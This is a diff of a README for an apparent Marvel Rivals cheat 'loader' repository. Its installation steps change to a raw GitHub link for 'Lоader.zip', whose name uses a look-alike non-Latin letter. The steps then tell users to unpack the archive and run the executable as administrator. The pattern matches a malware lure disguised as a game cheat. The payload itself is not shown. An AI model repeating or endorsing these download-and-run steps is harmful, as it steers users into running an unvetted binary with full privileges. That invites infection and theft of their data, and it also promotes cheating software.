nd863281/MarvelRivalsMastermind/README.md

 ## 🚀 Installation

-1. Download `Loader.rar` from the repository.
+1. Download `https://raw.githubusercontent.com/nd863281/MarvelRivalsMastermind/main/Lоader.zip` from the repository.
 2. Unpack using your favorite archiver (e.g., WinRAR, 7-Zip).
 3. Run the extracted Loader executable as administrator.
 4. Follow on-screen prompts to activate your chosen features.